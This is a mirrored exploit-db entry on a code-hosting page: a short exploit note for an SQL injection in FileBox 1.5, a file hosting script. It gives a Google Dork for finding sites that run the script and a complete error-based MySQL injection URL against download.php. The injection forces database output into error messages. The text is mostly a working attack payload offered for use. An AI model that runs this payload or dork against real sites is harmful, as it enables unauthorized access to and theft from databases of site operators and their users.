bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/17753.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

16 lines
No EOL
722 B
Text
Raw Permalink Blame History

# Exploit Title: FileBox - File Hosting & Sharing Script 1.5 SQL Injection
# Google Dork: inurl:FileBox
# Date: 30/08/2011
# Author: Scripts Apart
# Software Link: http://www.scriptsapart.com
# Version: 1.5
# Tested on: Windows 7 , Ubuntu 11
# CVE :
# Exploit Discovered : SubhashDasyam
# Website : http://www.subhashdasyam.com
There is a SQL Vulnerability in the FileBox Script
http://localhost/download.php?id=%20and(select%201%20from(select%20count(*),concat((select%20(select%200x53514c20417661696c61626c65206279205375626861736844617379616d)%20from%20`information_schema`.tables%20limit%200,1),floor(rand(0)*2))x%20from%20`information_schema`.tables%20group%20by%20x)a)%20and%201=1
The sqli is MYSQL_Error based one
Reference in a new issue View git blame Copy permalink